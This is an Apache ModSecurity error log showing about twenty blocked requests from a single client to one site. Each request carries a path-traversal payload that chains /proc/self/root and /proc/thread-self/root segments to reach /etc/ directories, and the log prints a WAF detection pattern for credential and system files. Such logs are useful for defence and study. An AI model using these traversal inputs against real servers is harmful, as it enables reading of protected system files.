[Mon Mar 16 17:38:58.799716 2026] [:error] [pid 14895:tid 140411641214720] [client 74.7.241.46:45458] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqYlajLEzk2WiQ-10rsAAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:38:59.996587 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:45468] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqY9SswJuvopo3lOh37AAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:39:01.368417 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.241.46:45484] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqZVajLEzk2WiQ-10rsQAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:39:02.551040 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:45486] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqZqQpVkWug9HeOt9NxwAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:39:03.825517 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:45502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqZ7ysWC90G-1nBrBdyQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:39:08.888363 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:45514] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqbI6lpbStxTqkSkuDWwAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:18.834053 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.241.46:50284] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqdo6lpbStxTqkSkuDZgAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:39:28.816709 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:39766] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqgNSswJuvopo3lOh3-wAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:30.135568 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:59604] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqgo6lpbStxTqkSkuDZwAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:31.268334 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.241.46:59618] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqg7ysWC90G-1nBrBdzgAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:32.571015 2026] [:error] [pid 29507:tid 140411741927168] [client 74.7.241.46:59622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqhEr9dMAiw-8KANNi3wAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:33.721142 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:59626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqhaTCbgAP5jq5TehFKgAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:34.971048 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:59640] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqhqQpVkWug9HeOt9NzAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:36.840541 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:59648] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqiLABkC4fWIHEf8EOfAAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:37.997945 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:45596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqiVajLEzk2WiQ-10rygAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:39.260888 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.241.46:45608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqi1ajLEzk2WiQ-10rzgAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:40.591041 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:45622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqjFajLEzk2WiQ-10r0QAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:41.902670 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:45630] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqjbABkC4fWIHEf8EOfQAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:43.084443 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:45642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqj7ABkC4fWIHEf8EOfgAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:44.384576 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:45658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqkLABkC4fWIHEf8EOgAAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:45.536647 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.241.46:45674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqkc_BxrYCr4hPDw8DrgAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
